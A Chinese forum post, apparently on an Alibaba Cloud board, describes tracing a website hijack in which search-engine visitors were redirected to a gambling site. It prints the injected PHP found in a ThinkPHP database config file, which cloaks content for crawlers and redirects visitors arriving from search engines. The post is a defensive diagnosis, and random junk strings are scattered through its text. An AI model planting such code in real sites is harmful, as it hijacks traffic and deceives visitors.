阿里云
服务器地域选择
发表主题 回复主题
  • 784阅读
  • 0回复

[基础常识]查找网站访问被跳转到其它网址原因一例

级别: 论坛版主
发帖
11517
云币
26098

— 本帖被 不靠谱贝贝 设置为精华(2017-08-24) —
感谢“***zy”的鼓励和支持。 ?q68{!{bi  
oic}Go  
一网友说他的网站被“黑”了,现象是,在搜索引擎里搜索网址,收录的首页是一个X彩的网站内容,且点击搜索引擎链接进入网站,会随机出现一些其它站点的内容。但直接在浏览器里输入网址就正常。 D92#&,KD  
a ]PS`  
过程: +2}aCoL\  
m&'z|eN  
1. 在网上搜索了一些资料,说有可能是根据访问者的 http User Agent 和 http_referer 来跳转或显示不同内容的 $WOiXLyCk  
xaiA?  
if S) < t  
Jb~nu  
jh3LD6|s}  
UE3#(:x A  
2. 同一台服务上的另一个站点不会出现类似的现象,所以就重点看发生问题的站点文件 a"!D @a  
lL*k!lNs  
3. 站点是用 ThinkPHP 框架写的,尝试替换 ThinkPHP 的文件内容,无效 C$Y pk\p  
g@&@ ]63  
4. 尝试替换 app 里的内容,也是无效 ;'\{T#5)  
E&?z-,-o@  
5. 鼓捣了很久(我是门外汉,不懂php编程和网站的安全运维),无意中,看到日志文件中出现 NOTIC: [8] Undefined index: HTTP_REFERER 的字样 7qyv.{+  
Jy,Dcl  
B:YUb{CJ  
R+c  {Pl  
6. 找到相应的文件,有以下php代码 Q7ez?]j6  
'qosw:P  
  1. <?php
  2. $arr = array('baidu','360','so','Sogou','bing','yisou','sm','google');
  3. for($i=0;$i<count($arr);$i++){
  4.     if (ereg($arr[$i], $_SERVER["HTTP_USER_AGENT"])) {
  5.         $file = file_get_contents('http://bbs.aliyun.com/');
  6.         echo $file;
  7.         exit;
  8.     }
  9. }
  10. $arr1 = array('baidu','360','so','Sogou','bing','yisou','sm','google');
  11. for($j=0;$j<count($arr1);$j++){
  12.     if (ereg($arr1[$j], $_SERVER["HTTP_REFERER"])) {
  13.         Header("Location: https://www.aliyun.com/");
  14.         exit;
  15.     }
  16. }
  17. return array (
  18.   'DB_HOST' => 'localhost',
  19.   'DB_NAME' => 'dbname',
  20.   'DB_USER' => 'dbuser',
  21.   'DB_PWD' => 'dbpassword',
  22.   'DB_PORT' => '3306',
  23.   'DB_PREFIX' => 'xxx_',
  24. );
I|6wPV?  
OVsZUmSG  
7. 注释掉怀疑的代码(return array 上边的)后测试,正常了 |JpLMUG  
;tS4 h  
参考:《网站被黑检测》 - http://s.tool.chin az.com/tools/webcheck.aspx
[ 此帖被dongshan8在2017-08-23 16:44重新编辑 ]
关键词: 跳转
Debian 是一个自由的操作系统 (OS),提供您安装在计算机上使用。操作系统就是能让您的计算机工作的一系列基本程序和实用工具。
发表主题 回复主题
« 返回列表上一主题下一主题

限100 字节
批量上传需要先选择文件,再选择上传
 
验证问题: 阿里云官网域名是什么? 正确答案:www.aliyun.com
上一个 下一个